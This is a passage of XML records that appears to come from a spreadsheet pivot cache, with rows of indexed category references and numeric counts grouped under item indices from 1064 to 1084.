  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1064"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="16"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="45"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1065"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="14"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1066"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="11"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="37"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1068"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="19"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1069"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1070"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1071"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1072"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1073"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1074"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="18"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1075"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="15"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="15"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="57"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="426"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1076"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1077"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1078"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1079"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="569"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="569"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="179"/>
    <x v="569"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="66"/>
    <x v="569"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="569"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="27"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1080"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="20"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="15"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="48"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="254"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1081"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="15"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="65"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="40"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1082"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="30"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="45"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="65"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1083"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1084"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="59"/>
    <x v="1084"/>
  </r>
  <r>
